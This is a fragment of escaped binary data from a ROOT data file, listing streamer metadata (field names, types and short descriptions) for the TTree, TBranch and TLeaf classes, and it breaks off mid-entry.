bytes\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00x\x80\x00\x02\x08@\x00\x00p\x00\x02@\x00\x00j\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfFlushedBytes\x1cNumber of auto-flushed bytes\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00v\x80\x00\x02\x08@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fWeight"Tree weight (see TTree::SetWeight)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00v\x80\x00\x02\x08@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efTimerInterval\x1eTimer interval in milliseconds\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00{\x80\x00\x02\x08@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfScanField\'Number of runs before prompting in Scan\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fUpdate\x1eUpdate frequency for EntryLoop\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x9a\x80\x00\x02\x08@\x00\x00\x92\x00\x02@\x00\x00\x8c\x00\x04@\x00\x00^\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x16fDefaultEntryOffsetLen:Initial Length of fEntryOffset table in the basket buffers\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x9d\x80\x00\x02\x08@\x00\x00\x95\x00\x02@\x00\x00\x8f\x00\x04@\x00\x00a\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efNClusterRangeENumber of Cluster range in addition to the one defined by \'AutoFlush\'\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x8f\x80\x00\x02\x08@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00N\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfMaxEntries5Maximum number of entries in case of circular buffers\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x80\x80\x00\x02\x08@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfMaxEntryLoop$Maximum number of entries to process\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x8a\x80\x00\x02\x08@\x00\x00\x82\x00\x02@\x00\x00|\x00\x04@\x00\x00I\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0ffMaxVirtualSize,Maximum total size of buffers kept in memory\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xae\x80\x00\x02\x08@\x00\x00\xa6\x00\x02@\x00\x00\xa0\x00\x04@\x00\x00m\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfAutoSaveVAutosave tree when fAutoSave entries written or -fAutoSave (compressed) bytes produced\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xb3\x80\x00\x02\x08@\x00\x00\xab\x00\x02@\x00\x00\xa5\x00\x04@\x00\x00r\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfAutoFlushZAuto-flush tree when fAutoFlush entries written or -fAutoFlush (compressed) bytes produced\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x86\x80\x00\x02\x08@\x00\x00~\x00\x02@\x00\x00x\x00\x04@\x00\x00E\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfEstimate.Number of entries to estimate histogram limits\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xa8\x80\x00\x17\xd0@\x00\x00\xa0\x00\x02@\x00\x00\x81\x00\x04@\x00\x00M\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x10fClusterRangeEnd/[fNClusterRange] Last entry of a cluster range.\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\x14\x0efNClusterRange\x05TTree@\x00\x00\xba\x80\x00\x17\xd0@\x00\x00\xb2\x00\x02@\x00\x00\x93\x00\x04@\x00\x00_\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfClusterSizeE[fNClusterRange] Number of entries in each cluster for a given range.\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\x14\x0efNClusterRange\x05TTree@\x00\x00\xa0\x80\x00\x08\xbf@\x00\x00\x98\x00\x02@\x00\x00\x92\x00\x04@\x00\x00V\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfIOFeatures=IO features to define for newly-written baskets and branches.\x00\x00\x00>\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11ROOT::TIOFeatures@\x00\x00i\x80\x00\x03\xc7@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBranches\x10List of Branches\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00\x82\x80\x00\x03\xc7@\x00\x00z\x00\x02@\x00\x00t\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fLeaves+Direct pointers to individual branch leaves\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00\x90\x80\x00\x16\xcb@\x00\x00\x88\x00\x02@\x00\x00\x82\x00\x04@\x00\x00Q\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fAliases;List of aliases for expressions based on the tree branches.\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00m\x80\x00\x08\xbf@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfIndexValues\x13Sorted index values\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00j\x80\x00\x08\xbf@\x00\x00b\x00\x02@\x00\x00\\\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fIndex\x16Index of sorted values\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayI@\x00\x00\x81\x80\x00\x16\xcb@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfTreeIndex"Pointer to the tree Index (if any)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0eTVirtualIndex*@\x00\x00w\x80\x00\x16\xcb@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fFriends"pointer to list of friend elements\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x8f\x80\x00\x16\xcb@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00P\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfUserInfo9pointer to a list of user objects associated to this Tree\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x84\x80\x00\x16\xcb@\x00\x00|\x00\x02@\x00\x00v\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfBranchRef(Branch supporting the TRefTable (if any)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0bTBranchRef*\x00@\x00\x00\xb5\x80\x00\x00[@\x00\x00\xad\x00\t@\x00\x00\x1f\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x11ROOT::TIOFeatures\x00\x1a\xa1/\x10\x00\x00\x00\x01@\x00\x00|\x80\x00\x00\x9b@\x00\x00t\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00[\x80\x00\x02\x08@\x00\x00S\x00\x02@\x00\x00M\x00\x04@\x00\x00\x15\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fIOBits\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\runsigned char\x00@\x00\x0b\xb9\x80\x00\x00[@\x00\x0b\xb1\x00\t@\x00\x00\x15\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x07TBranch\x00\x10\x97\x8a\xac\x00\x00\x00\r@\x00\x0b\x8a\x80\x00\x00\x9b@\x00\x0b\x82\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00k\x80\x00\x00\xc6@\x00\x00c\x00\x03@\x00\x00Y\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttFill\x14Fill area attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd9*\x92\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00r\x80\x00\x02\x08@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x006\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfCompress\x1fCompression level and algorithm\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00s\x80\x00\x02\x08@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBasketSize\x1eInitial Size of Basket Buffer\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x93\x80\x00\x02\x08@\x00\x00\x8b\x00\x02@\x00\x00\x85\x00\x04@\x00\x00W\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0ffEntryOffsetLen:Initial Length of fEntryOffset table in the basket buffers\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00p\x80\x00\x02\x08@\x00\x00h\x00\x02@\x00\x00b\x00\x04@\x00\x004\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfWriteBasket\x1aLast basket number written\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x90\x80\x00\x02\x08@\x00\x00\x88\x00\x02@\x00\x00\x82\x00\x04@\x00\x00O\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfEntryNumber5Current entry number (last one filled in this branch)\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x89\x80\x00\x08\xbf@\x00\x00\x81\x00\x02@\x00\x00{\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfIOFeatures&IO features for newly-created baskets.\x00\x00\x00>\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11ROOT::TIOFeatures@\x00\x00f\x80\x00\x02\x08@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fOffset\x15Offset of this branch\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00u\x80\x00\x02\x08@\x00\x00m\x00\x02@\x00\x00g\x00\x04@\x00\x009\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfMaxBaskets Maximum number of Baskets so far\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00g\x80\x00\x02\x08@\x00\x00_\x00\x02@\x00\x00Y\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfSplitLevel\x12Branch split level\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fEntries\x11Number of entries\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x82\x80\x00\x02\x08@\x00\x00z\x00\x02@\x00\x00t\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfFirstEntry(Number of the first entry in this branch\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x8e\x80\x00\x02\x08@\x00\x00\x86\x00\x02@\x00\x00\x80\x00\x04@\x00\x00M\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfTotBytes6Total number of bytes in all leaves before compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x8d\x80\x00\x02\x08@\x00\x00\x85\x00\x02@\x00\x00\x7f\x00\x04@\x00\x00L\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfZipBytes5Total number of bytes in all leaves after compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00{\x80\x00\x03\xc7@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x009\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfBranches"-> List of Branches of this branch\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00w\x80\x00\x03\xc7@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x005\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fLeaves -> List of leaves of this branch\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00y\x80\x00\x03\xc7@\x00\x00q\x00\x02@\x00\x00k\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fBaskets!-> List of baskets of this branch\x00\x00\x00=\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tTObjArray@\x00\x00\x96\x80\x00\x17\xd0@\x00\x00\x8e\x00\x02@\x00\x00p\x00\x04@\x00\x00A\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfBasketBytes\'[fMaxBaskets] Length of baskets on file\x00\x00\x00+\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04int*\x00\x00\x00\r\x0bfMaxBaskets\x07TBranch@\x00\x00\xa5\x80\x00\x17\xd0@\x00\x00\x9d\x00\x02@\x00\x00\x7f\x00\x04@\x00\x00K\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfBasketEntry1[fMaxBaskets] Table of first entry in each basket\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\r\x0bfMaxBaskets\x07TBranch@\x00\x00\x9d\x80\x00\x17\xd0@\x00\x00\x95\x00\x02@\x00\x00w\x00\x04@\x00\x00C\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBasketSeek*[fMaxBaskets] Addresses of baskets on file\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\r\x0bfMaxBaskets\x07TBranch@\x00\x00\xa0\x80\x00\x01?@\x00\x00\x98\x00\x02@\x00\x00\x92\x00\x04@\x00\x00`\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfFileNameIName of file where buffers are stored ("" if in same file as Tree header)\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString\x00@\x00\x01\xc6\x80\x00\x00[@\x00\x01\xbe\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TLeafI\x00~j\xae\x19\x00\x00\x00\x01@\x00\x01\x98\x80\x00\x00\x9b@\x00\x01\x90\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00{\x80\x00\x00\xc6@\x00\x00s\x00\x03@\x00\x00i\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TLeaf\'Leaf: description of a Branch data type\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00m\x1e\x81R\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00z\x80\x00\x02\x08@\x00\x00r\x00\x02@\x00\x00l\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum(Minimum value if leaf range is specified\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00z\x80\x00\x02\x08@\x00\x00r\x00\x02@\x00\x00l\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum(Maximum value if leaf range is specified\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x03\xd4\x80\x00\x00[@\x00\x03\xcc\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TLeaf\x00m\x1e\x81R\x00\x00\x00\x02@\x00\x03\xa7\x80\x00\x00\x9b@\x00\x03\x9f\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00m\x80\x00\x02\x08@\x00\x00e\x00\x02@\x00\x00_\x00\x04@\x00\x001\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x04fLen\x1fNumber of fixed length elements\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00t\x80\x00\x02\x08@\x00\x00l\x00\x02@\x00\x00f\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fLenType"Number of bytes for this data type\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00v\x80\x00\x02\x08@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fOffset%Offset in ClonesArray object (if one)\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x81\x80\x00\x02\x08@\x00\x00y\x00\x02@\x00\x00s\x00\x04@\x00\x00D\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fIsRange.(=kTRUE if leaf has a range, kFALSE otherwise)\x00\x00\x00\x12\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04bool@\x00\x00|\x80\x00\x02\x08@\x00\x00t\x00\x02@\x00\x00n\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfIsUnsigned&(=kTRUE if unsigned, kFALSE otherwise)\x00\x00\x00\x12\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04bool@\x00\x00\x9b\x80\x00\x16\xcb@\x00\x00\x93\x00\x02@\x00\x00\x8d\x00\x04@\x00\x00\\\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLeafCountDPointer to Leaf count if variable length (we do not own the 